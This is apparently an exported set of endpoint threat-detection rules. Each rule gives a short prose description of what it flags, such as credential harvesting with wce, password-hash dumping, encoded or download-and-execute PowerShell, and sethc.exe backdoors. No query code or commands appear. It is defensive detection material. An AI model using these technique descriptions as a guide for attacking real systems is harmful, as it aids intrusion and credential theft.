Execution from Recycle Bin Show executions from the Windows Recycle Bin Attackers often use the Recycle Bin folders to hide their malware. Processes executing from this location are highly suspicious. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 1 Suspicious process name Identify processes with names designed to hide in plain sight A common technique used by malware is to use names that sound like, or look like, legitimate Windows system file names. For example, using an “0” (zero) instead of an “o”, or using a lowercase “l” instead of an “i". This rule looks for commonly seen filenames using these techniques that have been associated with malware. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 2 Processes with obfuscated extensions Show processes with obfuscated extensions A common malware technique is to embed a fake/benign looking extension into an executable file. For example, if extensions are not displayed (which is the default in Explorer), a file called “foo.gif.exe” would show as “foo.gif” and appear to be an image file which an unwitting user might double-click to view. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 3 Known malware file name This query identifies processes with names that are unique / rare enough to be interesting and are generally associated with specific attacks Processes and modules with these names have been observed to be related to known malware While we believe these names are unique enough to avoid triggering false positives, it is possible that a legitimate file could use the same name. 100 4 Execution from System Volume Information folder Show executions from the System Volume Information folder Attackers often use the System Volume Information folder to hide their malware. Processes executing from this location are highly suspicious. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 5 Possible BlackPOS malware registry artifact This query identifies the creation or modification of a registry key associated with the installation of a malicious service related to the BlackPOS malware family . An attacker may use the BlackPOS malware family to steal sensitive data such as credit card information from Point-of-Sale terminals. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 6 Possible APT backdoor installation This query looks for indications of sethc.exe or utilmon.exe being replaced. This activity can effectively create a backdoor to the system. One tactic observed to be associated with APT activity is the creation of a ‘backdoor’ by replacing one of these files with cmd.exe or another binary. Replacing one of these files with cmd.exe could provide attackers an interactive shell with SYSTEM privileges. These files may be legitimately replaced via system update activity. 100 7 Possible Ransomware file artifact This query is designed to identify specific files associated with some ransomware malware variants. Some types of malware encrypt data on the target system and demand a ransom in exchange for encryption keys that can be used to recover the data. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 8 Possible Point-of-Sale malware file artifact This query is designed to identify files that are known to be associated with various malware attacks on Point-of-sale systems An attacker may deploy malware to steal sensitive information such as credit card data from POS terminals. While we are currently unaware of any specific conditions that would generate false positives for this query, it is possible that legitimate files could use the same file names and paths this query is designed to look for. 100 9 Execution from APT staging area This query is designed to identify processes executed from locations associated with APT activity. Malicious actors have been observed to use various locations to stage their malware, where they are unlikely to be identified or flagged as unusual. Under normal conditions, the paths shown here should not contain .exe files. While unlikely, it is possible an end-user could move or copy legitimate executable files to this location. 100 10 Possible credential theft or misuse This query looks for indications of the execution of the ‘Windows Credential Editor’, or wce tool. Wce.exe is a tool that allows for the harvesting of credentials on a system and performs pass-the-hash and pass-the-ticket attacks. This tool is often used during attacks to escalate privileges and move through the target environment. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 11 Possible ZeroAccess activity This query is designed to identify activity associated with the ZeroAccess family of malware. ZeroAccess is a widespread malware family that contains rootkit functionality and can be used for a variety of malicious purposes by attackers. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 12 Possible Tibet.c backdoor installation This query identifies files that are known to be associated with the installation of a backdoor in OSX. This activity is associated with multiple variants of Tibet.c We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 13 Possible wirelurker infection This query identifies an attempt to create files attributed to a wirelurker infection. The existence of these files is highly indicative of an infection. Wirelurker is a malware family that infects OSX as well as iOS and can migrate from one platform to the other when a mobile device is connected via USB. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 14 ntvdm.exe spawned by office application This query identifies office applications with a child process named ntvdm.exe. Office applications such as Word and Excel are often targeted by attackers. We have observed ntvdm.exe, a legitimate windows component, being spawned as a component of some of these attacks. We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation. 100 15 Siesta campaign indicators Files identified by this report are associated with the Siesta campaign. The existence of these files is highly indicative of infection. The Siesta campaign revolves around a threat actor that is targeting consumer goods and services, energy, finance, healthcare, media and telecommunications, public administration, security and defense, and transport and traffic industries. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 16 PlugX campaign indicators Files identified by this report are associated with the PlugX malware family. Variants of the PlugX malware family were observed using these md5s, domain names, or IP addresses. The PlugX malware is a sophisticated back door observed to be used by sophisticated adversaries in targeted attacks. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 17 Modification of launchd.conf This query identifies processes that modify /etc/launchd.conf. Attackers may modify this file in order to gain persistence for malicious code on a target system. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 18 Suspicious OSX persistence mechanism This query identifies processes with command line arguments that may be used to modify the loginwindow.plist. Attackers may modify this plist in order to gain persistence for malicious code on a target system. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 19 Modification of /etc/rc.common This query identifies processes that modify /etc/rc.common. Attackers may modify this file in order to gain persistence for malicious code on a target system. We have observed some cases where this file is legitimately modified by other system files. 100 20 Possible Olyx/Lasyr activity This query identifies processes that have behaviors consistent with the Olyx/Lasyr malware family. Olyx/Lasyr is a backdoor written for the OSX platform. Attackers may install this on a target system in order to facilitate their attack. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 21 Possible wirenet and/or netweird activity This query identifies processes that have behaviors consistent with the wirenet and netweird malware families. Wirenet and netweird are 2 different malware families that use a common technique for persistence. Attackers may leverage this malware to steal information or gain persistence on a target system. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 22 Possible Flashback infection This query identifies an unusual file modification consistent with behaviors of the flashback malware family. Flashback is a backdoor written for the OSX platform. Attackers may install this on a target system in order to facilitate their attack. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 23 Possible iWorm infection This query identifies filesystem and network behavior consistent with the iWorm malware family. Iworm is a backdoor written for the OSX platform. Attackers may install this on a target system in order to facilitate their attack. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 24 Possible NetWeirdRC infection Files identified by this report are associated with the Siesta campaign. The existence of these files is highly indicative of infection. NetWeirdRC is a backdoor written for the OSX platform. Attackers may install this on a target system in order to facilitate their attack. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 25 Suspicious local password change This query identifies the use of the dscl command to change passwords. Attackers may use this command to manipulate passwords on a system. This would be highly unusual as most password changes are done via the GUI or centralized admin tools. This command may be legitimately used by system administrators or power users to administer the system. 100 26 Attempted osx password hash collection This query identifies attempts to dump hashes associated with user accounts on the system. Attackers may use this command to gather password hashes for user accounts on the system. These hashes may be used to identify the plain text passwords, which could then be leveraged in an attack. This command may be legitimately used by system administrators or power users to administer the system. 100 27 Execution from trash bin This query will identify files that are executed from the Trash bin on an osx system. Attackers will often attempt to hide their files in the Trash bin and operate from that area. In general, files in this location have been discarded and should not be running. We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation. 100 28 Suspicious process execution This query identifies the execution of highly suspicious processes typically leveraged in an attack targeting linux or osx systems. The processes identified in this query are frequently used in malware or in an attack scenario. These utilities are not native to osx or most linux distributions, and are often indicative of malicious activity. These processes may be used during audits or other administrative functions, but are highly suspicious. 100 29 Suspicious shell activity This query identifies processes that run system commands consistent with those an attacker might use after gaining a remote shell on a system. When an attacker gains access to a system, they will often run commands to survey the local environment. This is typically just the start of the malicious activity. These commands might also be rarely used in the same shell by a power user or administrator. 100 30 Powershell executed with encoded instructions This query identifies encoded scripts being passed to powershell on the command line. In order to avoid parsing issues and bypass the powershell execution policy, a script can be base64 encoded and passed to powershell on the command line. This technique has been observed to be used in malware and by attackers. Administrators may use this technique for system administration. 100 31 iModification of powershell execution policy This query looks for changes to the registry key that set the powershell execution policy. Attackers may modify this registry key to change the powershell execution policy to facilitate their attack. While this key may be modified by system administrators, it should be a rare occurrence. 100 32 Possible malicious powershell activity This query looks for powershell arguments that could be used to download and dynamically execute content. Powershell can be given commands to download arbitrary content from the Internet and execute it. This could be used for persistence or for large-scale attacks. It is possible this functionality could be used for legitimate purposes, but it should be rare. 100 33 Possible WMI Persistence This query looks for evidence of a persistence mechanism using WMI that appears when registering a WMI event filter that uses w32_localtime. Windows Management Instrumentation (WMI) can be leveraged to provide a persistence mechanism to attackers. One of the techniques often used is to have an event kick off at a specific time which typically requires win32_localtime. A legitimate WMI filter may use w32_localtime as well. 100 34 Possible WMI command invocation This query looks for instances of wmic started with command line options intended to execute code. Attackers may use WMI for lateral movement or to operate under the radar. Administrators typically use other methods for command execution. Administrators may legitimately use this functionality. 100 35 WinRM command activity This query identifies executions of WinRM.cmd or WinRM.vbs with the invoke parameter. Windows Remote Management (WinRM) is a protocol that allows for remotely administering systems. It can be leveraged by attackers for lateral movement or remote command execution. The WinRM service may be legitimately used by administrators. 100 36